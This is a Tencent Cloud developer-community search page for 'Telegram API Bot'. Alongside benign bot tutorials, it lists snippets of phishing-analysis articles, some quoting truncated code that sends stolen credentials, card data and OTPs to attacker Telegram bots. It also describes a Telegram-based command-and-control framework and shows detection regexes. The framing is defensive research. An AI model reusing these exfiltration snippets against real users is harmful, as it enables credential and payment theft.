Telegram API Bot -对触摸按钮的CallbackQuery响应 - 腾讯云开发者社区

文章/答案/技术大牛

发布

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

攻击者利用Telegram开放的Bot API，将钓鱼活动模块化、自动化、甚至“服务化”——从模板分发、数据回传到会话接管，全部通过聊天界面完成，宛如一个地下“钓鱼SaaS平台”。..."时间: " . date('Y-m-d H:i:s');// 调用Telegram API发送消息file_get_contents("https://api.telegram.org/bot{$bot_token...开放API成双刃剑Telegram之所以成为钓鱼团伙的首选平台，源于其三大特性：Bot API完全开放且文档完善：开发者可轻松创建具备消息推送、按钮交互、文件传输能力的机器人；端到端加密非默认启用：普通群组和频道通信未加密...即便部署了终端检测与响应（EDR）系统，若未特别监控 api.telegram.org 的异常POST请求，也极易漏报。对此，工作组建议采取以下技术对策：1....、Zscaler）阻止对 core.telegram.org 和 api.telegram.org 的非业务访问。

1601 0

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

研究发现，攻击者通过将前端钓鱼页面与后端Telegram Bot解耦，显著提升了运营弹性与响应速度；同时利用Telegram频道的广播特性，实现“一对多”指令同步。...关键词：Telegram机器人；凭证钓鱼；Bot API；会话接管；多因素认证；行为检测1 引言随着云服务与数字身份的深度融合，凭证窃取已成为网络攻击的核心目标。...Telegram Bot API的开放性为此类攻击提供了技术基础。任何开发者均可注册Bot并获取唯一token，通过简单HTTP请求实现消息收发。...可通过以下方式提取IOC：监控外联请求中包含api.telegram.org/bot的HTTP流量；提取Bot Token模式（格式：数字:字母数字串）；关联短链（如bit.ly、cutt.ly）解析后的...;)企业亦可部署DNS防火墙，阻止对api.telegram.org的非授权访问（除IT管理用途外）。

2411 0

您找到你想要的搜索结果了吗？

是的

没有找到

玩转OpenClaw｜云上OpenClaw(Clawdbot)快速接入Telegram指南

远程登录服务器首先，前往轻量云Lighthouse控制台即可查看刚刚选购或重装完成的OpenClaw实例，点击页面内的登录按钮。...Channel配置-接入Telegram接下来进入 Select channel 步骤，通过键盘方向键选中 Telegram (Bot API) ，并且回车确认。...输入Bot token输入前面步骤“在Telegram中创建Bot”中保存的 Telegram Bot token 。...完成以上步骤之后，您已经初步完成了OpenClaw接入Telegram Bot。在Telegram中与Bot聊天在上文中BotFather的聊天中，点击图示的位置，打开Bot对话框。...点击 START 按钮。首次对话时，Telegram Bot会发送一个配对码，需要在服务器中执行下方的命令完成配对。远程登录腾讯云轻量应用服务器中，输入并执行以下命令。

12.9K4 3

Telegram小程序钓鱼攻击机制与防御策略研究

研究结论对提升Telegram生态安全性、防范基于消息平台的新型金融诈骗具有实践意义。...与Apple App Store或Google Play不同，Telegram对Mini Apps的发布几乎不设门槛。...Mini App的启动流程如下：用户点击消息中的“Launch”按钮或Bot菜单项；Telegram客户端加载开发者预设的HTTPS URL；页面通过window.Telegram.WebApp对象与宿主环境通信...示例：Kaspersky for Android可通过Notification Listener API监控Telegram通知中的链接，并在用户点击前弹出风险提示。...：允许用户一键标记可疑Mini App，缩短响应时间；限制高危API调用：对涉及钱包连接的Mini App强制显示二次确认弹窗。

2761 0

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

本文聚焦于2025年曝光的一类以Telegram为核心载体的高级钓鱼活动，系统剖析其如何利用Bot API、公开频道、WebView嵌入及消息自毁等原生功能，实现凭据窃取、会话劫持与恶意分发的闭环。...本文提出一套涵盖终端行为监控、身份认证加固、浏览器运行时保护与威胁情报提取的多维防御框架，并辅以可落地的代码示例，验证对异常Telegram进程通信、WebView劫持及Bot API调用的识别能力。...与传统依赖自建C2服务器或僵尸网络的模式不同，此类攻击完全依托Telegram的合法服务链——包括Bot API、公开频道、私有群组及内嵌WebView——构建隐蔽且高效的攻击管道。...本文填补此空白，通过逆向真实攻击样本，还原技术细节，并构建一个覆盖“检测—阻断—响应—预防”四阶段的防御体系，特别强调对终端进程行为、浏览器运行时环境及API调用模式的细粒度监控。...：对公开频道消息进行NLP分析，识别“空投”、“白名单”+“连接钱包”组合；信誉评分：对频繁被举报的Bot自动降权或暂停服务。

3121 0

面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

文中提供可部署的自动化检测脚本示例，包括相似域名生成与监控、邮件URL跳转链解析、Telegram Bot通信特征提取等关键技术实现。...3.3 数据外泄路径典型数据流如下：Victim → Fake Login Page → PHP Collector Script → Telegram Bot (via API) → Attacker...Dashboard其中，Telegram Bot成为核心枢纽。...(creds):url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"payload = {"chat_id": CHAT_ID,"text...；实施URL信誉实时查询：集成VirusTotal、Google Safe Browsing API，在用户点击前拦截高风险链接；建立内部钓鱼演练机制：模拟“账单逾期”场景，评估员工响应并针对性培训。

2051 0

一封“域名续费”邮件，竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

Sarah没有多想，点击了邮件中的“立即续费”按钮——这一操作，让她公司绑定的商务信用卡在接下来的两小时内被刷走近8,000美元。...作为数据外传通道，实现对金融凭证的精准收割。...Please try again.");});第四阶段：Telegram作为“零基础设施”数据管道与传统钓鱼攻击需自建C2服务器不同，本次攻击的创新点在于完全依赖Telegram Bot作为数据接收端。...攻击者在后端使用Python或Node.js脚本，将收集到的数据通过Telegram Bot API实时推送至私有频道：# 攻击者服务器后端（Python + python-telegram-bot）import...(chat_id=CHAT_ID, text=f" OTP: {otp}")return "OK"这种方式极大降低了攻击门槛：无需维护服务器IP（Telegram提供稳定API）；数据传输端到端加密（Telegram

1891 0

Telegram Bot – 在线获取群聊GroupChat ID 教程

假设机器人名称是my_bot。 1-将机器人添加到组中。转到组，单击组名称，单击添加成员，在搜索框中搜索您的机器人，如下所示：@my_bot，选择您的机器人并单击添加。 2-向机器人发送虚拟消息。...也许消息应该以 / 开头） 3- 转到以下网址： https://api.telegram.org/botXXX:YYYY/getUpdates 将 XXX:YYYY 替换为您的机器人令牌，如： https...://api.telegram.org/bot123456789:jbd78sadvbdy63d37gda37bd8/getUpdates 4- 查找 "chat":{"id":-zzzzzzzzzz，...5-测试：您可以测试使用 curl 向群组发送消息： curl -X POST "https://api.telegram.org/botXXX:YYYY/sendMessage" -d "chat_id...此外，如果有多个组，您可以在响应中查找组名（“title”：“ group_name ”）。

36.6K3 0

【技术分享】使用电报API免费创建个人通知系统

这是一款维护良好的应用程序，由许多功能提供支持，使其比竞争对手更具优势。今天，我们正在探索 Telegram 的 API。...Telegram 具有一个非常简单的 API，几乎可以自动化任何事情——您甚至可以使用它来向您发送消息。为什么需要个人通知系统？作为开发人员，即使我们远离键盘，我们的工作也在不断运行。.../startchat_id 在这里，你可以使用 curl 或任何你想要的客户端;你只需要向这个 url 发出一个 GET 请求： https://api.telegram.org/bot[TOKEN]/...使用 GET 请求发送消息最终，向聊天发送消息就像向以下 URL 发出 GET 请求一样简单： https://api.telegram.org/bot[TOKEN]/sendMessage?...电子邮件对我来说有一个非常具体的作用，因为它们是我个人沟通的主要方式。和业务问题，所以我不想弄乱我的收件箱或有一个单独的电子邮件地址。

6.5K6 0

基于Telegram外传的WordPress域名续费钓鱼攻击分析与防御机制

此类攻击不仅利用了管理员对域名管理时效性的焦虑心理，还借助Telegram平台的端到端加密通信和低部署成本，显著提升了隐蔽性与成功率。...(2.4) 数据外传：Telegram作为隐蔽通道所有窃取的数据通过前端JavaScript实时发送至攻击者控制的Telegram Bot。...Bot（通过IFTTT或自建Webhook）fetch('https://api.telegram.org/bot/sendMessage', {method: 'POST',headers...消息默认端到端加密（Secret Chat模式）或至少传输加密，且Bot API调用无需暴露攻击者真实IP，此类外传方式极难被网络流量监控系统识别。...Bot Token或使用代理中转，规避API监控。

981 0

钓鱼攻击中窃取数据的流转路径与防御机制研究

本文基于近期对钓鱼基础设施、数据外传通道及暗网交易市场的实证分析，系统梳理了从凭证窃取到多阶段滥用的完整链条。...研究发现，现代钓鱼操作已高度模块化与自动化，广泛采用Telegram Bot、Phishing-as-a-Service（PhaaS）平台等技术实现数据实时回传与集中管理；被盗凭证经初步清洗后，或用于直接盗用...2.2 Telegram Bot 成为主流回传通道当前绝大多数钓鱼页面嵌入Telegram Bot API实现即时数据推送。...攻击者首先在Telegram上创建Bot并获取token，随后在钓鱼脚本中调用Telegram的sendMessage接口。...例如，通过DNS sinkholing将钓鱼域名解析至蜜罐服务器，捕获回传请求；或向Telegram Bot发送伪造凭证，污染攻击者数据库。此类主动防御虽不能阻止初始钓鱼，但可降低其运营效率。

1751 0

命令控制之Telegram

的Bots功能结合Python来对API的调用来实现C2。...Cracking Telegram Encryption，而且Telegram支持发送所有文件类型，Telegram提供对外开放的api，用户可定制性的开发客户端。...之后成功创建Token： 12724xxxx059:AAEINExxxxxxxxxxxxxxxxxxx_hIl8A Bot API 示例安装依赖目前Telegram官网已经公开了如下语言的开发实例:...以上介绍了Bot API中发送、接收文本消息和上传、下载文件的功能，剩下只需要将功能拼接，添加命令解析，就可以实现一个简易的C2 Server POC bt2框架项目介绍 Bt2是一个使用python...编写开发的C2框架，它使用了telegram提供的基础设施和功能丰富的bot api，稍微改变了其通信平台的用途，使其可以充当c&c。

4.1K2 0

基于“Smishing Triad”事件的短信钓鱼攻击机制与防御体系研究

为此，本文提出融合品牌保护、通信内容策略、终端行为分析与自动化威胁情报响应的纵深防御框架，并提供可部署的代码示例，包括相似域名生成监控、短信关键词正则匹配、Telegram Bot通信特征提取及移动钱包异常绑定检测逻辑...关键词：短信钓鱼；Smishing Triad；Lighthouse；钓鱼即服务；移动支付；Telegram Bot；品牌仿冒；SSL证书滥用1 引言随着移动支付在全球范围内的普及，攻击者正将焦点从传统网络钓鱼...os.getenv('TG_CHAT_ID')def exfiltrate_card_data(card_info):url = f"https://api.telegram.org/bot{BOT_TOKEN...值得反思的是，当前防御体系仍以“事后响应”为主，缺乏对攻击链前端（如短信投递、域名注册）的主动干预能力。...8 结语Google对Smishing Triad的诉讼不仅是法律行动，更是对PhaaS生态的一次战术打击。

2171 0

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

在此基础上，提出一套融合技术检测、用户教育与策略响应的多层防御框架，并通过代码示例验证关键检测逻辑的有效性。...更关键的是，Telegram Bot作为数据回传通道，具有高隐蔽性与实时性：// telegram.phpfunction send_to_telegram($user, $pass, $ip) {$bot_token...\nUser: $user\nPass: $pass\nIP: $ip";$url = "https://api.telegram.org/bot$bot_token/sendMessage?...API调用if re.search(r'api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/sendMessage', packet.payload):if not whitelist.contains...企业亦应实施最小权限原则，限制Aruba账户的API访问范围。六、结语本文通过对一款针对意大利Aruba用户的钓鱼工具包进行逆向分析，揭示了其前端仿冒、地理过滤、Telegram外传等关键技术特征。

2091 0

一个基于Go的Telegram RSS Bot机器人，支持应用内阅读预览

说明：很久前博主介绍过一个Telegram RSS机器人→传送门，用起来还不错，就是安装对新手不太友好，这里就再介绍一个基于Go的Telegram RSS Bot，安装很快，也支持直接在Telegram...应用内预览订阅文章，很方便，也是博主用过最好用的一个Telegram RSS机器人，这里就说下使用方法。...2、申请Telegraph Token curl https://api.telegra.ph/createAccount?...API的情况，国外忽略 socks5: 127.0.0.1:1080 #RSS源扫描间隔(分钟)，选填 update_interval: 10 #源最大出错次数，选填 error_threshold:...100 #自定义telegram bot api url，选填 telegram: endpoint: https://xxx.com/ #使用Mysql数据库，不填则默认使用SQLite mysql

2.1K0 0

telegram-1：向tg的机器人群推送消息

Telegram Bot的创建简单，API全面且免费，适合国际业务。业务需求：最近需要将自动客户端的自动打包结果的二维码和下载地址推送到tg机器人群，需要了解。...目录： (1).创建telegram机器人 (2).创建一个接受机器人消息的群组 (3).python向bot推送消息的demo 1.相关准备 2.测试demo (1).创建telegram机器人登录...浏览器访问下述url获取这个群组的chat_id： https://api.telegram.org/bot5049056695:AAFfyxCap2I0SZazC0DJ7WPw5oBz9oZcl7A/...getUpdates 在返回值中找到这个群组的chat_id，机器人会向这个chat_id发送消息： -750599670 (3).python向bot推送消息的demo 1.相关准备去官网查看下api...: https://core.telegram.org/bots/api 需要用到 python-telegram-bot 库。

12.1K3 0

部署你的RSS机器人

API 的环境)(可忽略) mysql(MySQL 数据库配置)(可忽略) sqlite(SQLite 配置)(可忽略(已配置 mysql 时，该项失效)) telegram.endpoint(自定义...telegram bot api url)(可忽略) allowed_users(允许使用 bot 的用户 telegram id)(可忽略(为空时所有用户都能使用 bot)) 申请 Telegram...image.png 然后给你的 Telegram Bot 取一个昵称和名字，框中马赛克部分就是创建的 Telegram Bot Token，请妥善保管该 Token： 202204171105882.png...author_url 请替换成自己的查看 Telegram ID | 默认的配置是允许所有用户使用我们刚刚创建的 Telegram RSS Bot，但为了安全、防止被滥用我们可以设置指定 ID 的...Telegram 用户能够使用该 Bot，获取允许使用用户（比如自己）的 Telegram ID 并填入配置文件的 allowed_users 字段获取 Telegram ID：https://t.me

1.4K2 0

使用n8n搭建服务器监控系统：从Webhook到Telegram告警的完整实现

适用场景：中小规模服务器（1-50台）的资源监控需要快速搭建监控告警系统希望通过Telegram接收告警通知对监控系统有定制化需求环境准备基础环境：n8n 工作流平台（本文基于最新稳定版）Telegram...Bot（用于接收告警消息）支持HTTPS的域名（用于Webhook接收）配置信息获取：n8n域名：替换your-n8n-domain.com为你的n8n实际部署域名认证Token：使用openssl...rand -hex 32命令生成强随机字符串Telegram Chat ID：与Bot对话后访问 https://api.telegram.org/botBOT_TOKEN>/getUpdates...发送告警到Telegram当检测到告警时，通过Telegram Bot发送通知消息：执行以下命令进行安装/配置：从配置可以看到，Telegram节点的关键设置：Resource: MessageOperation...返回成功响应扩展功能：每日汇总（定时生成和发送监控摘要）Telegram命令触发器（支持通过Telegram控制）整个工作流采用可视化配置，所有节点通过连线表示数据流向，维护和调试都非常直观。

2.2K10 0

玩转OpenClaw｜云上OpenClaw(Clawdbot)快速接入Slack指南

选择Bot scopes（Bot 权限），添加以下权限：权限添加完成后，点击页面上方的Install to Workspace（安装到工作区），在弹出的授权窗口中，确认授权并完成安装。...开启事件订阅（Events）左侧导航栏找到Event Subscriptions（事件订阅），点击Enable Events（开启事件），开启后才能接收Slack中的消息、事件通知，实现Bot响应。...配置模型API Key为OpenClaw配置模型API Key可以直接在Lighthouse服务器的应用管理页面进行操作。...OpenClaw基础配置首先，前往轻量云Lighthouse控制台即可查看刚刚选购或重装完成的OpenClaw实例，点击页面内的登录按钮。...网关启动成功后，终端会提示「连接成功」，此时您可以在Slack中发送消息，OpenClaw会正常响应，并以AI的方式进行对话，此时即代表接入完成。

1.3K4 0

Clawdbot开源了，Siri该有的样子，在手机里指挥AI干活

大家好，我是 Ai 学习的老章给大家介绍个开源项目，在外面被吹上天了——Clawdbot，号称目前最接近"真正的个人AI助手"的开源实现——你通过 WhatsApp、Telegram、Discord、...支持的聊天平台包括：平台接入方式说明 WhatsApp QR 码扫码配对（Baileys）最常用的方式 Telegram Bot Token（grammY）机器人 API Discord Bot...没订阅也行，用 API Key 或者本地模型都可以。 3. 浏览器控制（Browser Tool）这是 Clawdbot 最硬核的能力之一：真正的浏览器 RPA。...配置 WhatsApp 的过程：运行 clawdbot channels login 终端弹出二维码手机 WhatsApp 扫码完成！然后给自己发条消息，AI 就响应了。...制作不易，如果这篇文章觉得对你有用，可否点个关注。给我个三连击：点赞、转发和在看。若可以再给我加个，谢谢你看我的文章，我们下篇再见！

1.9K2 0

点击加载更多

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

玩转OpenClaw｜云上OpenClaw(Clawdbot)快速接入Telegram指南

Telegram小程序钓鱼攻击机制与防御策略研究

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

面向意大利主机托管客户的定向钓鱼攻击机制与防御策略研究

一封“域名续费”邮件，竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

Telegram Bot – 在线获取群聊GroupChat ID 教程

【技术分享】使用电报API免费创建个人通知系统

基于Telegram外传的WordPress域名续费钓鱼攻击分析与防御机制

钓鱼攻击中窃取数据的流转路径与防御机制研究

命令控制之Telegram

基于“Smishing Triad”事件的短信钓鱼攻击机制与防御体系研究

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

一个基于Go的Telegram RSS Bot机器人，支持应用内阅读预览

telegram-1：向tg的机器人群推送消息

部署你的RSS机器人

使用n8n搭建服务器监控系统：从Webhook到Telegram告警的完整实现

玩转OpenClaw｜云上OpenClaw(Clawdbot)快速接入Slack指南

Clawdbot开源了，Siri该有的样子，在手机里指挥AI干活

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐